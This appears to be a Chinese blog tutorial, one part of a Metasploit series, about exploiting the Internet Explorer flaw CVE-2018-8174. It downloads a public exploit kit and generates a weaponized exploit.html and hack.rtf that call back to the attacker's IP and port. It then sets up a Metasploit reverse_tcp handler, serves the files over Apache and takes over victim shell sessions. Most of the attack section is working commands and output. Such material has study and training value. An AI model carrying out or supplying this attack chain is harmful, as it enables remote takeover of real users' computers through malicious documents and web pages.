Metasploit实例-CVE-2018-8174漏洞(七)

2022年10月25日13:50:30 发表评论 122 views

1.1.1 利用CVE-2018-8174获取shell

0DAY漏洞最早的破解是专]针对软件的,叫做WAREZ,后来才发展到游戏,音乐,影视等其他内容的。0day 中的0表示zero,早期的Oday表示在软件发行后的24小时内就出现破解版本,现在我们已经引申了这个含义,只要是在软件或者其他东西发布后,在最短时间内出现相关破解的,都可以叫0day。

0day是一个统称,所有的破解都可以叫0day,CVE-2018-8174漏洞影响最新版本的IE浏览器及使用了IE内核的应用程序。用户在浏览网页或打开Office文档时都可能中招,最终被黑客植入后门木马完全控制电脑。微软在2018年4月20日早上确认此漏洞,并于2018年5月8号发布了官方安全补丁,对该Oday漏洞进行了修复,并将其命名为CVE-2018-8174。

1.1.1.1 下载安装CVE-2018-8174_EXP

Github地址:https://github.com/Yt1g3r/CVE-2018-8174_EXP

# mkdir -p /root/msf
# cd /root/msf
# wget https://codeload.github.com/Yt1g3r/CVE-2018-8174_EXP/zip/refs/heads/master
# unzip master
# mv CVE-2018-8174_EXP-master CVE-2018-8174_EXP

1.1.1.2 使用脚本创建后门网址和文件

注意:此脚本需要python2版本进行使用!!!

# python CVE-2018-8174.py -u http://192.168.10.180/exploit.html -o hack.rtf -i 192.168.10.180 -p 4444
UNICODE_URL len 134 , need to pad ...
Generated hack.rtf successfully
!!! Completed !!!

  • 参数说明:

-u:URL地址,后门html文件

-o:生成后门文档

-i:攻击服务器地址,被攻击服务器要连接到的地址

-p:攻击服务器端口,被攻击服务器要连接到的端口

1.1.1.3 使用后门html

  • msf开启监听

msf6 > use exploit/multi/handler
[*] Using configured payload cmd/unix/reverse_netcat
msf6 exploit(multi/handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.10.180
LHOST => 192.168.10.180
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > run -j

  • 开启下载网址:

# cp exploit.html hack.rtf /var/www/html
# systemctl start apache2.service

1.1.1.4 受害者打开网页

Metasploit实例-CVE-2018-8174漏洞(七)

  • 查看连接情况:

msf6 exploit(multi/handler) > sessions

Metasploit实例-CVE-2018-8174漏洞(七)
msf6 exploit(multi/handler) > sessions -i 2

Metasploit实例-CVE-2018-8174漏洞(七)

weinxin
我的微信
如果有技术上的问题可以扫一扫我的微信
版权声明
1. 本网站名称:Leon的博客
2. 本站永久网址:https://blog.leonshadow.cn
3. 本网站的文章部分内容可能来源于网络,仅供大家学习与参考,如有侵权,请联系站长QQ632113590进行删除处理。
4. 本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
5. 本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
6. 本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。
liyang